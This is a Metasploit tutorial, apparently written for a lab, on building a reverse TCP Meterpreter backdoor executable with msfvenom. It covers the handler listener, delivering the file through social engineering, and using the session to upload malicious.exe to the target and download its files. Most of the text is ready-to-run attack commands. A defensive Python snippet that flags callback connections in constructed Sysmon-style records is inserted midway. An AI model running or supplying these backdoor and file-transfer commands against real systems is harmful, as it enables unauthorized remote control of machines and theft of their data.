Disclaimer: This guide is for educational purposes only. Unauthorized use of these techniques for hacking activities is illegal.
Metasploit is a core framework for penetration testing. This guide covers generating a reverse TCP Meterpreter payload with msfvenom, catching its connection with a listener, and transferring files over the resulting session.
Lab Setup
Network Layout:
Attacker: Kali Linux
- IP: 10.0.1.50
Target: Windows 10/11
- IP: 10.0.1.20
Building a Covert Backdoor with msfvenom
Step 1: Generate the Payload
Create a reverse TCP Meterpreter payload as a Windows executable. The command below applies no encoder, so the output is the stock msfvenom executable:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.50 LPORT=4444 -f exe > /root/hidden_backdoor.exe
Step 2: Deploy the Payload
Transfer hidden_backdoor.exe to the Windows machine using social engineering tactics.
Step 3: Initiate the Listener
Configure Metasploit to listen for the payload's connection:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit
Executing the backdoor on the target system will initiate a Meterpreter session.
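Seen from the defender's side, the callback that creates this session is an outbound TCP connection from the target (10.0.1.20) to 10.0.1.50:4444. The following is an added example, not part of the original guide, that triages network-connection records for that pattern. The records are constructed and modelled on Sysmon Event ID 3 fields; the user name, directory markers and expected-port set are assumptions.

```python
# Constructed sample records modelled on Sysmon Event ID 3 (network connection) fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\Downloads\hidden_backdoor.exe", "Initiated": True,
     "DestinationIp": "10.0.1.50", "DestinationPort": 4444},
    {"Image": r"C:\Program Files\ExampleAgent\agent.exe", "Initiated": True,
     "DestinationIp": "10.0.1.60", "DestinationPort": 8443},
    {"Image": r"C:\Windows\System32\svchost.exe", "Initiated": False,
     "DestinationIp": "10.0.1.20", "DestinationPort": 3389},
]

# Assumed policy values, not from the guide; tune them per environment.
USER_WRITABLE_MARKERS = ("\\users\\public\\", "\\downloads\\", "\\appdata\\local\\temp\\")
EXPECTED_PORTS = {53, 80, 123, 443}
HANDLER_PORTS = {4444}  # LPORT used by the handler in this guide


def triage(event):
    """Return (severity, reasons); severity is None when no alert is warranted."""
    if not event.get("Initiated"):
        return None, []  # inbound connection, not a callback from this host
    port = int(event["DestinationPort"])
    writable = any(m in event["Image"].lower() for m in USER_WRITABLE_MARKERS)
    reasons = []
    if writable:
        reasons.append("process image is in a user-writable directory")
    if port in HANDLER_PORTS:
        reasons.append(f"destination port {port} is a watched handler port")
    elif port not in EXPECTED_PORTS:
        reasons.append(f"destination port {port} is outside the expected set")
    if writable and port not in EXPECTED_PORTS:
        return "high", reasons  # both signals agree
    if writable or port in HANDLER_PORTS:
        return "medium", reasons  # one strong signal on its own
    return None, []  # an unusual port alone is too noisy to alert on


def find_callbacks(events):
    """Return an alert dict for every event that triage() rates medium or high."""
    alerts = []
    for event in events:
        severity, reasons = triage(event)
        if severity:
            dest = f'{event["DestinationIp"]}:{event["DestinationPort"]}'
            alerts.append({"severity": severity, "image": event["Image"],
                           "dest": dest, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print(*find_callbacks(SAMPLE_EVENTS), sep="\n")
```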
Transferring Files with Meterpreter
With an active Meterpreter session, you can easily transfer files.
Upload Files to the Target
Ensure the Meterpreter session is active. If it is not, start the listener again as in Step 3:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit
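From the meterpreter prompt, upload a file from the attacker machine to the target (backslashes in the Windows path are doubled because the Meterpreter console treats a single backslash as an escape character):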
upload /root/malicious.exe C:\\Users\\Public\\malicious.exe
Download Files from the Target
From the meterpreter prompt, retrieve a file from the target to the attacker machine:
download C:\\Users\\Public\\data.txt /root/data.txt
Useful Meterpreter Commands
List Files:
ls
Change Directory:
cd C:\\Users\\Public
Summary
Using Metasploit, you can create and deploy backdoors, and manage files efficiently with Meterpreter. Always adhere to ethical guidelines and legal requirements during penetration testing.